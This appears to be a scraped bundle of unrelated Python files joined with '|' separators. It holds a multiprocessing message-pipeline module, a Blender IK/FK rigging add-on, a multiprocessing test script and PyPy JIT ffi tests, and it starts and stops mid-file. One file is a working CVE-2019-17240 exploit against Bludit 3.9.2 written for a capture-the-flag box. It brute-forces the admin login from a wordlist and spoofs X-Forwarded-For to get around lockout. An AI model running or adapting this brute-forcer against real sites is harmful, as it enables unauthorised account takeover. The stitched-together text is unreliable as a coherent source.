logging.debug("TEMPLE::{0}::PIPE IN send:{1}".format(conn, msg_in))
else:
is_active = queue_ctrl.get()
else:
queue_ctrl.close()
class TEMPLE:
def __init__(self, conn: (URL, str)):
# "tcp://*:<port>"
self.me = conn
self.priest_pipe_in = Pipe()
self.priest_queue_ctrl = Queue(CONFIG.MQ_MAX_DEPTH)
self.believer_queue_ctrl = Queue(CONFIG.MQ_MAX_DEPTH)
self.priest = None
self.believer = None
def start(self):
is_active = True
self.priest_queue_ctrl.put(is_active)
self.priest = Process(target=priest,
args=(self.me, self.priest_queue_ctrl, self.priest_pipe_in[0]))
self.priest.start()
def open(self, role: str, func: callable = None):
is_active = True
self.start()
self.believer_queue_ctrl.put(is_active)
if role in ["sender"]:
self.believer = Process(target=sender, args=(self.priest_pipe_in[1], self.believer_queue_ctrl, func))
elif role in ["treater", "encrypter"]:
self.believer = Process(target=treater, args=(self.priest_pipe_in[1], self.believer_queue_ctrl, func))
elif role in ["receiver"]:
self.believer = Process(target=receiver, args=(self.priest_pipe_in[1], self.believer_queue_ctrl, func))
else: # default is treater
self.believer = Process(target=treater, args=(self.priest_pipe_in[1], self.believer_queue_ctrl, func))
self.believer.start()
def close(self):
is_active = False
if isinstance(self.believer, Process):
self.believer_queue_ctrl.put(is_active)
time.sleep(CONFIG.MQ_BLOCK_TIME)
self.believer.terminate()
while not self.believer_queue_ctrl.empty():
self.believer_queue_ctrl.get()
self.believer = None
def stop(self):
self.close()
is_active = False
if isinstance(self.priest, Process):
self.priest_queue_ctrl.put(is_active)
time.sleep(CONFIG.MQ_BLOCK_TIME)
self.priest.terminate()
while not self.priest_queue_ctrl.empty():
self.priest_queue_ctrl.get()
self.priest = None
def allocator(conn: URL):
if conn is None:
return None
else:
if conn.scheme in ["oracle", "mysql"]:
return SQL(conn)
if conn.scheme in ["tcp"]:
return MQ(conn)
if conn.scheme in ["ftp"]:
return FTP(conn)
if conn.scheme in ["ftpd"]:
return FTPD(conn)
if conn.scheme in ["tomail"]:
return TOMAIL(conn)
if conn.scheme in ["file"]:
return FILE(conn)
def sender(pipe_in: Pipe, queue_ctrl: Queue, func: callable = None):
"""
:param pipe_in: Pipe # ๆถๆฏ็ฎก้ ๏ผMSG, ๏ผ
:param queue_ctrl: Queue # ๆงๅถ ("is_active",):(bool,)
:param func: callable # ่ชๅฎไนๅค็่ฟ็จ
:return: None
"""
is_active = queue_ctrl.get()
while is_active:
# ----------------------------------------- Queue
if queue_ctrl.empty():
try:
msg_sender = pipe_in.recv()
logging.info("TEMPLE::SENDER PIPE IN recv:{0}".format(msg_sender))
except EOFError:
is_active = False
continue
origination = allocator(msg_sender.origination) # Data.read(msg)
treatment = allocator(msg_sender.treatment) # MessageQueue
encryption = allocator(msg_sender.encryption) # MessageQueue
destination = allocator(msg_sender.destination) # MessageQueue
# --------- origination -----------------------------------------
if isinstance(origination, MQ):
msg_origination = origination.request(msg_sender)
logging.debug("TEMPLE::SENDER::{0}::ORIG request:{1}".format(msg_sender.origination, msg_origination))
else:
msg_origination = origination.read(msg_sender)
logging.debug("TEMPLE::SENDER::{0}::ORIG read:{1}".format(msg_sender.origination, msg_origination))
# --------- encryption ------------------------------------------
if encryption is None:
msg_encryption = msg_origination
else:
msg_encryption = encryption.request(msg_origination)
logging.debug("TEMPLE::SENDER::{0}::ENCRYPT request:{1}".format(msg_sender.encryption, msg_encryption))
del msg_origination
# --------- treatment -------------------------------------------
if treatment is None:
msg_treatment = msg_encryption
else:
msg_treatment = treatment.request(msg_encryption)
logging.debug("TEMPLE::SENDER::{0}::TREAT request:{1}".format(msg_sender.treatment, msg_treatment))
del msg_encryption
# --------- function --------------------------------------------
if func is None:
msg_function = msg_treatment
else:
msg_function = func(msg_treatment)
logging.debug("TEMPLE::SENDER func:{0}".format(msg_function))
del msg_treatment
# --------- destination -----------------------------------------
if isinstance(destination, MQ):
destination.push(msg_function)
logging.info("TEMPLE::SENDER::{0}::DEST push:{1}".format(msg_sender.destination, msg_function))
else:
destination.write(msg_function)
logging.info("TEMPLE::SENDER::{0}::DEST write:{1}".format(msg_sender.destination, msg_function))
else:
is_active = queue_ctrl.get()
else:
while not queue_ctrl.empty():
queue_ctrl.get()
def receiver(pipe_in: Pipe, queue_ctrl: Queue, func: callable = None):
"""
:param pipe_in: Pipe # ๆถๆฏ็ฎก้ ๏ผMSG, ๏ผ
:param queue_ctrl: Queue # ๆงๅถ ("is_active",):(bool,)
:param func: callable # ่ชๅฎไนๅค็่ฟ็จ
:return: None
"""
is_active = queue_ctrl.get()
while is_active:
# ----------------------------------------- Queue
if queue_ctrl.empty():
try:
msg_receiver = pipe_in.recv()
logging.info("TEMPLE::RECEIVER PIPE IN recv:{0}".format(msg_receiver))
except EOFError:
is_active = False
continue
origination = allocator(msg_receiver.origination) # MessageQueue
treatment = allocator(msg_receiver.treatment) # MessageQueue
encryption = allocator(msg_receiver.encryption) # MessageQueue
destination = allocator(msg_receiver.destination) # Data.write
# --------- origination -----------------------------------------
if isinstance(origination, MQ):
msg_origination = origination.pull()
logging.info("TEMPLE::RECEIVER::{0}::ORIG pull:{1}".format(msg_receiver.origination, msg_origination))
else:
msg_origination = origination.read(msg_receiver)
logging.info("TEMPLE::RECEIVER::{0}::ORIG read:{1}".format(msg_receiver.origination, msg_origination))
# --------- encryption ------------------------------------------
if encryption is None:
msg_encryption = msg_origination
else:
msg_encryption = encryption.request(msg_origination)
logging.debug("TEMPLE::RECEIVER::{0}::ENCRYPT request:{1}".format(msg_receiver.encryption,
msg_encryption))
del msg_origination
# --------- treatment -------------------------------------------
if treatment is None:
msg_treatment = msg_encryption
else:
msg_treatment = treatment.request(msg_encryption)
logging.debug("TEMPLE::RECEIVER::{0}::TREAT request:{1}".format(msg_receiver.treatment,
msg_treatment))
del msg_encryption
# --------- function --------------------------------------------
if func is None:
msg_function = msg_treatment
else:
msg_function = func(msg_treatment)
logging.debug("TEMPLE::RECEIVER func:{0}".format(msg_function))
del msg_treatment
# --------- destination -----------------------------------------
if isinstance(destination, MQ):
destination.request(msg_function)
logging.info("TEMPLE::RECEIVER::{0}::DEST request:{1}".format(msg_receiver.destination,
msg_function))
else:
destination.write(msg_function)
logging.info("TEMPLE::RECEIVER::{0}::DEST write:{1}".format(msg_receiver.destination,
msg_function))
else:
is_active = queue_ctrl.get()
else:
while not queue_ctrl.empty():
queue_ctrl.get()
def treater(pipe_in: Pipe, queue_ctrl: Queue, func: callable = None):
"""
:param pipe_in: Pipe # ๆถๆฏ็ฎก้ ๏ผMSG, ๏ผ
:param queue_ctrl: Queue # ๆงๅถ ("is_active",):(bool,)
:param func: callable # ่ชๅฎไนๅค็่ฟ็จ
:return: None
"""
def treat_msg(msg_orig):
# --------- encryption ------------------------------------------
if encryption is None:
msg_encryption = msg_orig
else:
msg_encryption = encryption.request(msg_orig)
logging.debug("TEMPLE::TREATER::{0}::ENCRYPT request:{1}".format(msg_orig.encryption,
msg_encryption))
# --------- treatment -------------------------------------------
if treatment is None:
msg_treatment = msg_encryption
else:
msg_treatment = treatment.request(msg_encryption)
logging.debug("TEMPLE::TREATER::{0}::TREAT request:{1}".format(msg_orig.treatment,
msg_treatment))
del msg_encryption
# --------- function --------------------------------------------
if func is None:
msg_func = msg_treatment
else:
msg_func = func(msg_treatment)
logging.debug("TEMPLE::TREATER func:{0}".format(msg_func))
del msg_treatment
# --------- destination -----------------------------------------
if destination is None:
logging.info("TEMPLE::TREATER::NONE::DEST return:{0}".format(msg_func))
else:
if isinstance(destination, MQ):
destination.request(msg_func)
logging.info("TEMPLE::TREATER::{0}::DEST request:{1}".format(msg_orig.destination, msg_func))
else:
destination.write(msg_func)
logging.info("TEMPLE::TREATER::{0}::DEST write:{1}".format(msg_orig.destination, msg_func))
return msg_func
is_active = queue_ctrl.get()
while is_active:
if queue_ctrl.empty():
try:
msg_treater = pipe_in.recv()
logging.info("TEMPLE::TREATER PIPE IN recv:{0}".format(msg_treater))
except EOFError:
is_active = False
continue
origination = allocator(msg_treater.origination) # Data.read()
treatment = allocator(msg_treater.treatment) # MessageQueue
encryption = allocator(msg_treater.encryption) # MessageQueue
destination = allocator(msg_treater.destination) # Data.write()
# --------- origination -----------------------------------------
if isinstance(origination, MQ):
origination.reply(func=treat_msg)
else:
msg_origination = origination.read(msg_treater)
logging.info("TEMPLE::TREATER::{0}::ORIG read:{1}".format(msg_treater.origination, msg_origination))
treat_msg(msg_origination)
else:
is_active = queue_ctrl.get()
else:
while not queue_ctrl.empty():
queue_ctrl.get()
|
CVE-2019-17240_bludit-3.9.2_pwd-bruteforce_multi.py | #!/usr/bin/env python3
#coding: utf8
#CVE-2019-17240 Bludit <= 3.9.2 Admin Portal login brute-force tool for (HTB - blunder)
#Need valid username to use
import multiprocessing
import sys
import time
from multiprocessing import Queue
import re
import requests
def worker(cred_queue):
print('Starting new worker thread.')
while True:
try:
password = cred_queue.get(timeout=10)
except Queue.Empty:
return
try:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p = password))
headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u = username, p = password))
print()
break
except Exception:
#Make this exception more verbose and useful
e = sys.exc_info()[2]
print("Failed on: {0} {1}".format(password, str(e)))
return
#This is useful for rate-limiting. Uncomment to use.
# time.sleep(.5)
cleanup(procs)
sys.exit()
#For some reason I still can't get this to exit properly.
#TODO: Fix this to clean up all threads and exit gracefully upon success
#below is the error output
"""
Process Process-7:
Traceback (most recent call last):
File "/usr/lib/python3.8/multiprocessing/process.py", line 315, in _bootstrap
self.run()
File "/usr/lib/python3.8/multiprocessing/process.py", line 108, in run
self._target(*self._args, **self._kwargs)
File "bludit-3.9.2-bruteForce-multi.py", line 59, in worker
cleanup(procs)
File "bludit-3.9.2-bruteForce-multi.py", line 99, in cleanup
p.join()
File "/usr/lib/python3.8/multiprocessing/process.py", line 147, in join
assert self._parent_pid == os.getpid(), 'can only join a child process'
AssertionError: can only join a child process
"""
def file_to_list(wList):
passlist= []
#latin1 encoding is necessary to get `rockyou.txt` to work
#this may cause problems with other wordlists
#need to add check for encoding type on input file
with open(wList, encoding='latin1') as wordList:
templist = wordList.readlines()
for word in templist:
passlist.append(word.strip())
return passlist
def cleanup(processes):
# Wait for all worker processes to finish
for p in processes:
p.terminate()
p.join()
if __name__ == '__main__':
print("#CVE-2019-17240")
print("#Bludit <= 3.9.2 Admin Portal login brute-force tool")
if len(sys.argv) != 4:
print('Usage: python3 bludit-3.9.2-bruteForce-multi.py http://<ip> <username> </path/to/wordlist>')
sys.exit()
host = sys.argv[1]
login_url = host + '/admin/login'
username = sys.argv[2]
wordlist = sys.argv[3]
threads = 10
passwords = file_to_list(wordlist)
cred_queue = multiprocessing.Queue()
procs = []
print('Starting {0} worker threads.'.format(threads))
for i in range(threads):
p = multiprocessing.Process(target=worker, args=(cred_queue, ))
procs.append(p)
p.start()
print('Loading credential queue.')
for pwd in passwords:
cred_queue.put((pwd))
|
test.py | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 19 00:50:01 2019
@author: nac2313
"""
#module used for testing new code
import time
import multiprocessing
def basic_func(x):
if x == 0:
return 'zero'
elif x%2 == 0:
return 'even'
else:
return 'odd'
def multiprocessing_func(x):
y = x*x
time.sleep(2)
print('{} squared results in a/an {} number'.format(x, basic_func(y)))
return(y)
if __name__ == '__main__':
starttime = time.time()
processes = []
for i in range(0,10):
p = multiprocessing.Process(target=multiprocessing_func, args=(i,))
processes.append(p)
p.start()
for process in processes:
process.join()
print('That took {} seconds'.format(time.time() - starttime)) |
DtbIKBones.py | import sys
import os
import math
sys.path.append(os.path.dirname(__file__))
import bpy
import mathutils
from copy import deepcopy
from . import DazRigBlend
from . import DtbShapeKeys
from . import DataBase
from . import ToRigify
from . import Global
from . import Versions
from . import DtbDazMorph
from . import DtbOperators
from . import DtbPanels
from . import DtbMaterial
from . import CustomBones
from . import Poses
from . import Animations
from . import Util
from . import DtbCommands
from bpy.props import EnumProperty
from bpy.props import BoolProperty
from bpy.props import StringProperty
import threading
import time
BV = Versions.getBV()
num_bones = [6, 6, 3, 3]
ik_name = ['rHand_IK', 'lHand_IK', 'rShin_IK', 'lShin_IK']
bone_name = ['rHand', 'lHand', 'rShin', 'lShin']
bone_name_rigify = ['MCH-upper_arm_ik.R','MCH-upper_arm_ik.L','MCH-thigh_ik.R','MCH-thigh_ik.L']
mute_bones = []
ik_access_ban = False
obj_exsported = ""
def get_influece_data_path(bname):
amtr = Global.getAmtr()
if amtr is None:
return
if bname in amtr.pose.bones:
pbn = amtr.pose.bones[bname]
for c in pbn.constraints:
if bname + '_IK' in c.name:
return [c, 'influence']
return None
def get_ik_influence(data_path):
return eval("data_path[0].%s" % data_path[1])
def set_ik_influence(data_path, val):
exec("data_path[0].%s = %f" % (data_path[1], val))
def set_ik(data_path):
set_ik_influence(data_path, 1.0)
def set_fk(data_path):
set_ik_influence(data_path, 0.0)
def set_translation(matrix, loc):
trs = matrix.decompose()
rot = trs[1].to_matrix().to_4x4()
scale = mathutils.Matrix.Scale(1, 4, trs[2])
if BV<2.80:
return mathutils.Matrix.Translation(loc) * (rot * scale)
else:
return mathutils.Matrix.Translation(loc) @ (rot @ scale)
#TODO: Get intergate the setting into the import setup
def set_scene_settings(key_count):
scene = bpy.context.scene
# Set start and end playable range for the animations.
scene.frame_start = 0
scene.frame_end = key_count - 1
scene.frame_current = 0
# Set armature display settings
Global.setOpsMode('POSE')
armature = Global.getAmtr().data
armature.display_type = 'OCTAHEDRAL'
armature.show_names = False
armature.show_axes = False
armature.show_bone_custom_shapes = True
def manageKeyFrame(index, flg_to_ik, switch):
global mute_bones
amt = Global.getAmtr()
if index ==1000:
return
if amt is None:
return
if 'NG' in mute_bones:
return
if amt.animation_data is None:
return
act = amt.animation_data.action
if act is None:
return
ckey = bpy.context.scene.frame_current
if switch<0:
mute_bones = []
my_bone = amt.pose.bones[bone_name[index]]
num = num_bones[index]
for i in range(num):
mute_bones.append(my_bone.name)
my_bone = my_bone.parent
mute_bones.append(ik_name[index])
if index>1:
poles = ['', '', 'rShin_P', 'lShin_P']
foots = ['', '', 'rFoot', 'lFoot']
mute_bones.append(poles[index])
mute_bones.append(foots[index])
if flg_to_ik:
mute_bones.append("hip")
if switch < 0:
first_cr = bpy.context.scene.frame_start
first_ik = first_cr
prev_cr = -999
fkp_ik = Find_KeyFrame_Point(act.fcurves, mute_bones, ['influence',ik_name[index],bone_name[index]], ckey)
prev_ik = fkp_ik.previous
first_ik = fkp_ik.skip_first(first_ik)
if index > 1:
foots = ['', '', 'rFoot', 'lFoot']
fkp_cr = Find_KeyFrame_Point(act.fcurves, mute_bones, ['influence', 'Copy Rotation',foots[index]], ckey)
prev_cr = fkp_cr.previous
first_cr= fkp_cr.skip_first(first_cr)
if first_cr >= prev_cr:
first_cr = -999
if first_ik >= prev_ik:
first_ik = -999
for b in mute_bones:
for c in amt.pose.bones.get(b).constraints:
if (index > 1 and c.name == 'Copy Rotation' and b[1:]=='Foot'):
if first_cr > -1:
c.keyframe_insert(data_path='influence', frame=first_cr)
if prev_cr > -1:
c.keyframe_insert(data_path='influence', frame=prev_cr)
if c.name==ik_name[index]:
if first_ik >-1:
c.keyframe_insert(data_path='influence', frame=first_ik)
if prev_ik > -1:
c.keyframe_insert(data_path='influence', frame=prev_ik)
if switch==0:
for b in mute_bones:
if flg_to_ik==False:
if (b.endswith("_IK") or b.endswith("_P"))==False:
amt.pose.bones[b].keyframe_insert(data_path='rotation_euler', frame=ckey)
else:
if (b.endswith("_IK") or b.endswith("_P")):
amt.pose.bones[b].keyframe_insert(data_path='location', frame=ckey)
if index > 1 and b.endswith("_IK"):
amt.pose.bones[b].keyframe_insert(data_path='rotation_euler', frame=ckey)
for c in amt.pose.bones.get(b).constraints:
if (index > 1 and c.name == 'Copy Rotation') or c.name == ik_name[index]:
c.keyframe_insert(data_path='influence', frame=ckey)
else:
for fcu in act.fcurves:
if switch > 0 and fcu.mute:
fcu.mute = False
else:
names = fcu.data_path.split(sep='"', maxsplit=2)
if len(names) < 2:
continue
name = names[1]
if name in mute_bones and switch < 0:
fcu.mute = True
if switch==1:
mute_bones = []
class Find_KeyFrame_Point():
find_collection = []
skip_collection = []
previous = -999
def skip_first(self,now_first):
if len(self.skip_collection)>1:
wk = self.skip_collection[len(self.skip_collection)-1]
if wk == now_first:
return -999
else:
return now_first
else:
return now_first
def __init__(self,fcurves,find_keys,skip_keys,now_posision):
self.find_collection = []
self.skip_collection = []
self.previous = -999
for fc in fcurves:
for fk in find_keys:
if (fk in fc.data_path):
for point in fc.keyframe_points:
if point.co[0] < now_posision and (point.co[0] in self.find_collection) == False:
self.find_collection.append(point.co[0])
err = False
for sk in skip_keys:
if (sk in fc.data_path)==False:
err = True
break
if err ==False:
for point in fc.keyframe_points:
if point.co[0] < now_posision and (point.co[0] in self.skip_collection)==False:
self.skip_collection.append(point.co[0])
self.find_collection.sort()
self.find_collection.reverse()
self.skip_collection.sort()
self.skip_collection.reverse()
if len(self.find_collection)<=0:
self.previous = -999
elif len(self.skip_collection)<=0 or self.skip_collection[0] < self.find_collection[0]:
self.previous = self.find_collection[0]
else:
self.previous = -999
def fktoik(index):
manageKeyFrame(index, True, -1)
amt = Global.getAmtr()
adjust_shin_y(index, True)
my_bone = amt.pose.bones[bone_name[index]]
ik_bone = amt.pose.bones[ik_name[index]]
set_fk(get_influece_data_path(bone_name[index]))
Global.setOpsMode('OBJECT')
Global.setOpsMode('POSE')
ik_bone.matrix = set_translation(ik_bone.matrix, my_bone.tail)
set_ik(get_influece_data_path(bone_name[index]))
if index>1:
rot3 = Global.getFootAngle(index-2)
for ridx,rot in enumerate(rot3):
ik_bone.rotation_euler[ridx] = math.radians(rot)
toFootCopyRotate(index,True)
manageKeyFrame(index, True, 0)
if index == 0:
t = threading.Thread(target=my_srv0_1)
t.start()
if index == 1:
t = threading.Thread(target=my_srv1_1)
t.start()
if index == 2:
t = threading.Thread(target=my_srv2_1)
t.start()
if index == 3:
t = threading.Thread(target=my_srv3_1)
t.start()
def toFootCopyRotate(index,flg_ik):
copy_r = ['','','rFoot', 'lFoot']
pbone = Global.getAmtr().pose.bones
if pbone is None:
return
for c in pbone.get(copy_r[index]).constraints:
if 'Copy Rotation' == c.name:
if flg_ik:
c.influence = 1.0
else:
c.influence = 0.0
def my_service(index,flg_to_ik):
time.sleep(2)
manageKeyFrame(index, flg_to_ik, 1)
def my_srv0_1():
my_service(0,True)
def my_srv1_1():
my_service(1,True)
def my_srv2_1():
my_service(2,True)
def my_srv3_1():
my_service(3,True)
def my_srv0_0():
my_service(0,False)
def my_srv1_0():
my_service(1,False)
def my_srv2_0():
my_service(2,False)
def my_srv3_0():
my_service(3,False)
def iktofk(index):
manageKeyFrame(index, False, -1)
adjust_shin_y(index, False)
amt = Global.getAmtr()
ik_bone = amt.pose.bones[ik_name[index]]
my_bone = amt.pose.bones[bone_name[index]]
set_ik(get_influece_data_path(bone_name[index]))
Global.setOpsMode('OBJECT')
Global.setOpsMode('POSE')
ik_bone_matrixes = []
if my_bone.name=='lShin':
my_bone = amt.pose.bones.get('lFoot')
elif my_bone.name == 'rShin':
my_bone = amt.pose.bones.get('rFoot')
it = my_bone
for i in range(num_bones[index]+1):
if it == None:
continue
mx = deepcopy(it.matrix)
ik_bone_matrixes.append(mx)
it = it.parent
set_fk(get_influece_data_path(bone_name[index]))
if index >1:
toFootCopyRotate(index,False)
it = my_bone
for i in range(num_bones[index] + 1):
if it == None:
continue
it.matrix = deepcopy(ik_bone_matrixes[i])
it = it.parent
manageKeyFrame(index, False, 0)
if index == 0:
t = threading.Thread(target=my_srv0_0)
t.start()
if index == 1:
t = threading.Thread(target=my_srv1_0)
t.start()
if index == 2:
t = threading.Thread(target=my_srv2_0)
t.start()
if index == 3:
t = threading.Thread(target=my_srv3_0)
t.start()
def bone_disp2(idx,pose_bone,amt_bone,flg_hide):
hfp = CustomBones.hikfikpole
scales = [hfp[0],hfp[0],hfp[1],hfp[1],hfp[2],hfp[2]]
if amt_bone is None or pose_bone is None:
return
isAnim = Global.isExistsAnimation()
# blender 3.0 break change:
# Replaced PoseBone.custom_shape_scale scalar with a PoseBone.custom_shape_scale_xyz vector
if flg_hide and isAnim:
Versions.handle_custom_shape_scale(pose_bone, scales[idx] * 0.4)
else:
Versions.handle_custom_shape_scale(pose_bone, scales[idx])
if isAnim:
amt_bone.hide = False
else:
amt_bone.hide = flg_hide
def bone_disp(idx, flg_hide):
if idx < 0 or idx > 3:
for i in range(4):
bone_disp(i, flg_hide)
return
abones = Global.getAmtrBones()
pbones = Global.getAmtr().pose.bones
if ik_name[idx] in abones:
bone_disp2(idx, pbones.get(ik_name[idx]),abones.get(ik_name[idx]), flg_hide)
if idx>1:
pole = ik_name[idx][0:len(ik_name[idx])-2]
pole = pole + 'P'
if pole in abones:
bone_disp2(idx+2, pbones.get(pole), abones.get(pole),flg_hide)
# def bonerange_onoff(self):
# bonerange_onoff(self,bpy.contxt)
def bonerange_onoff(self,context):
flg_on = context.window_manager.br_onoff_prop
Global.boneRotation_onoff(context, flg_on)
def ifk_update0(self, context):
ifk_update(context, 0)
def ifk_update1(self, context):
ifk_update(context, 1)
def ifk_update2(self, context):
ifk_update(context, 2)
def ifk_update3(self, context):
ifk_update(context, 3)
def ifk_update(context, idx):
if Global.get_Amtr_name() == "" or ik_access_ban == True:
return {'FINISHED'}
if idx >= 0 and idx <= 3:
ik_force = (get_ik_influence(get_influece_data_path(bone_name[idx])) > 0.5)
gui_force = eval('context.window_manager.ifk' + str(idx))
if ik_force != gui_force:
if ik_force == False:
bone_disp(idx, False)
fktoik(idx)
else:
bone_disp(idx, True)
iktofk(idx)
return {'FINISHED'}
def adjust_shin_y(idx, flg_ik):
if Global.getAmtr() is None or idx < 2:
return
idx = idx - 2
bns = ['rShin', 'lShin']
Global.setOpsMode('EDIT')
mobj = Global.getBody()
if mobj is None:
Global.find_Both(Global.getAmtr())
return
vgs = mobj.data.vertices
fm_ikfk = [[4708 ,3418],[4428,3217]]
vidx = 0
if Global.getIsMan():
if flg_ik:
vidx = fm_ikfk[1][0]
else:
vidx = fm_ikfk[1][1]
else:
if flg_ik:
vidx = fm_ikfk[0][0]
else:
vidx = fm_ikfk[0][1]
if Global.getIsGen():
vidx = Global.toGeniVIndex(vidx)
Global.getAmtr().data.edit_bones[bns[idx]].head[1] = vgs[vidx].co[1]
Global.setOpsMode('POSE')
if flg_ik:
for i in range(2):
s = Global.getAmtr().pose.bones.get(bns[i])
if s is not None:
if s.rotation_euler[0] <= 0.0:
s.rotation_euler[0] = 0.1
def gorl_update(self, context):
w_mgr = context.window_manager
gorl = w_mgr.gorl_prop
if gorl == False:
for i, bn in enumerate(bone_name):
v = get_ik_influence(get_influece_data_path(bn))
if i == 0:
w_mgr.ifk0 = v > 0.5
elif i == 1:
w_mgr.ifk1 = v > 0.5
elif i == 2:
w_mgr.ifk2 = v > 0.5
elif i == 3:
w_mgr.ifk3 = v > 0.5 |
test_ffi.py | import sys, py
from pypy.module.pypyjit.test_pypy_c.test_00_model import BaseTestPyPyC
class Test__ffi(BaseTestPyPyC):
def test__ffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
i = 0
res = 0
while i < 300:
tmp = pow(2, 3) # ID: fficall
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
if 'ConstClass(pow)' in repr(loop): # e.g. OS/X
pow_addr = 'ConstClass(pow)'
assert loop.match_by_id('fficall', """
guard_not_invalidated(descr=...)
i17 = force_token()
setfield_gc(p0, i17, descr=<.* .*PyFrame.vable_token .*>)
f21 = call_release_gil(%s, 2.000000, 3.000000, descr=<Callf 8 ff EF=7>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""" % pow_addr)
def test__ffi_call_frame_does_not_escape(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
from _rawffi.alt import CDLL, types
except ImportError:
sys.stderr.write('SKIP: cannot import _rawffi.alt\n')
return 0
libm = CDLL(libm_name)
pow = libm.getfunc('pow', [types.double, types.double],
types.double)
def mypow(a, b):
return pow(a, b)
i = 0
res = 0
while i < 300:
tmp = mypow(2, 3)
res += tmp
i += 1
return pow.getaddr(), res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
pow_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
opnames = log.opnames(loop.allops())
# we only force the virtualref, not its content
assert opnames.count('new_with_vtable') == 1
def test__ffi_call_releases_gil(self):
from rpython.rlib.clibffi import get_libc_name
def main(libc_name, n):
import time
import os
from threading import Thread
#
if os.name == 'nt':
from _rawffi.alt import WinDLL, types
libc = WinDLL('Kernel32.dll')
sleep = libc.getfunc('Sleep', [types.uint], types.uint)
delays = [0]*n + [1000]
else:
from _rawffi.alt import CDLL, types
libc = CDLL(libc_name)
sleep = libc.getfunc('sleep', [types.uint], types.uint)
delays = [0]*n + [1]
#
def loop_of_sleeps(i, delays):
for delay in delays:
sleep(delay) # ID: sleep
#
threads = [Thread(target=loop_of_sleeps, args=[i, delays]) for i in range(5)]
start = time.time()
for i, thread in enumerate(threads):
thread.start()
for thread in threads:
thread.join()
end = time.time()
return end - start
log = self.run(main, [get_libc_name(), 200], threshold=150,
import_site=True)
assert 1 <= log.result <= 1.5 # at most 0.5 seconds of overhead
loops = log.loops_by_id('sleep')
assert len(loops) == 1 # make sure that we actually JITted the loop
def test_ctypes_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
import ctypes
libm = ctypes.CDLL(libm_name)
fabs = libm.fabs
fabs.argtypes = [ctypes.c_double]
fabs.restype = ctypes.c_double
x = -4
i = 0
while i < 300:
x = fabs(x)
x = x - 100
i += 1
return fabs._ptr.getaddr(), x
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name], import_site=True)
fabs_addr, res = log.result
assert res == -4.0
loop, = log.loops_by_filename(self.filepath)
ops = loop.allops()
opnames = log.opnames(ops)
assert opnames.count('new_with_vtable') == 1 # only the virtualref
py.test.skip("XXX re-optimize _ffi for the JIT?")
assert opnames.count('call_release_gil') == 1
idx = opnames.index('call_release_gil')
call = ops[idx]
assert (call.args[0] == 'ConstClass(fabs)' or # e.g. OS/X
int(call.args[0]) == fabs_addr)
def test__ffi_struct(self):
def main():
from _rawffi.alt import _StructDescr, Field, types
fields = [
Field('x', types.slong),
]
descr = _StructDescr('foo', fields)
struct = descr.allocate()
i = 0
while i < 300:
x = struct.getfield('x') # ID: getfield
x = x+1
struct.setfield('x', x) # ID: setfield
i += 1
return struct.getfield('x')
#
log = self.run(main, [])
py.test.skip("XXX re-optimize _ffi for the JIT?")
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('getfield', """
guard_not_invalidated(descr=...)
i57 = getfield_raw(i46, descr=<FieldS dynamic 0>)
""")
assert loop.match_by_id('setfield', """
setfield_raw(i44, i57, descr=<FieldS dynamic 0>)
""")
def test__cffi_call(self):
from rpython.rlib.test.test_clibffi import get_libm_name
def main(libm_name):
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libm = _cffi_backend.load_library(libm_name)
BDouble = _cffi_backend.new_primitive_type("double")
BInt = _cffi_backend.new_primitive_type("int")
BPow = _cffi_backend.new_function_type([BDouble, BInt], BDouble)
ldexp = libm.load_function(BPow, 'ldexp')
i = 0
res = 0
while i < 300:
tmp = ldexp(1, 3) # ID: cfficall
res += tmp
i += 1
BLong = _cffi_backend.new_primitive_type("long")
ldexp_addr = int(_cffi_backend.cast(BLong, ldexp))
return ldexp_addr, res
#
libm_name = get_libm_name(sys.platform)
log = self.run(main, [libm_name])
ldexp_addr, res = log.result
assert res == 8.0 * 300
loop, = log.loops_by_filename(self.filepath)
assert loop.match_by_id('cfficall', """
p96 = force_token()
setfield_gc(p0, p96, descr=<FieldP pypy.interpreter.pyframe.PyFrame.vable_token .>)
f97 = call_release_gil(91, i59, 1.0, 3, descr=<Callf 8 fi EF=7 OS=62>)
guard_not_forced(descr=...)
guard_no_exception(descr=...)
""", ignore_ops=['guard_not_invalidated'])
def test__cffi_call_c_int(self):
if sys.platform == 'win32':
py.test.skip("not tested on Windows (this test must pass on "
"other platforms, and it should work the same way)")
def main():
import os
try:
import _cffi_backend
except ImportError:
sys.stderr.write('SKIP: cannot import _cffi_backend\n')
return 0
libc = _cffi_backend.load_library(None)
BInt = _cffi_backend.new_primitive_type("int")
BClose = _cffi_backend.new_function_type([BInt], BInt)
_dup = libc.load_function(BClose, 'dup')
i = 0
fd0, fd1 = os.pipe()
while i < 300:
tmp = _dup(fd0) # ID: cfficall
os.close(tmp)
i += 1
os.close(fd0)
os.close(fd1)
